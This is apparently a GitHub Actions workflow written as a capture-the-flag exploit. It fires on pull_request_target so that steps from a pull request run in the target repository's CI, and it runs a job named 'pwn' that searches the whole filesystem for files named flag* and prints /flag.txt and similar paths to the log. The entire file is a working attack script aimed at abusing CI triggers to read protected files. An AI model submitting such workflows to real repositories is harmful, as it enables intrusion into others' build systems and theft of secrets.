name: backstage-pass-exploit
on:
  pull_request_target:
    branches: [ main, master ]

jobs:
  pwn:
    runs-on: ubuntu-latest
    steps:
      - name: Exfiltrate Flag
        run: |
          echo "--- BUSCANDO FLAG ---"
          find / -name "flag*" 2>/dev/null || true
          cat /flag.txt 2>/dev/null || cat /app/flag.txt 2>/dev/null || cat flag.txt 2>/dev/null
          echo "--- FIN ---"
